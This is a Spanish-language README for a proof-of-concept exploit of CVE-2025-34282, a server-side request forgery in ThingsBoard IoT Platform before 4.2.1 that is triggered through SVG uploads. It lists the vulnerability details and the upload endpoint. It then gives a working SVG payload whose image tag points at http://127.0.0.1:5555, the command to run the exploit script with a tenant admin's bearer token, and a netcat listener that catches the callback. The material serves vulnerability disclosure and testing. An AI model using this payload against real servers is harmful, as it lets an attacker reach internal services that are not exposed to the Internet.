
Exploit PoC para CVE-2025-34282 - SSRF en ThingsBoard mediante la carga de imágenes SVG
Vulnerabilidad de falsificación de solicitudes del servidor (SSRF) en ThingsBoard IoT Platform en versiones anteriores a 4.2.1.
Un atacante con acceso de Tenant Admin puede subir un archivo SVG manipulado que contiene una referencia a una URL interna a través de la galería de carga de imágenes. Cuando ThingsBoard procesa el SVG en el servidor, recupera la URL referenciada, lo que permite el acceso a servicios internos no expuestos a Internet.
| Campo | Detalles |
|---|
| CVE | CVE-2025-34282 |
| Versión afectada | < 4.2.1 |
| Versión corregida | 4.2.1 |
| Puntuación CVSS | 6.9 Media |
| CWE | CWE-918 (Falsificación de solicitudes del servidor) |
| Proveedor | https://thingsboard.io |
POST /api/image
publicLink del SVG mediante una etiqueta <object>
El payload ssrf_localhost_5555.svg incrusta una referencia a una URL interna:
<image xlink:href="http://127.0.0.1:5555" x="0" y="0" width="600" height="450" />
Al subirlo, el servidor de ThingsBoard obtiene http://127.0.0.1:5555, lo que confirma el SSRF.
Requisitos:
pip install requests
Ejecutar:
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py <svg_file> <bearer_token>
Ejemplo:
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py ssrf_localhost_5555.svg eyJhbGci...
Inicia un listener para capturar el callback del SSRF antes de ejecutar el exploit:
nc -l 5555
Tamil Mathi T.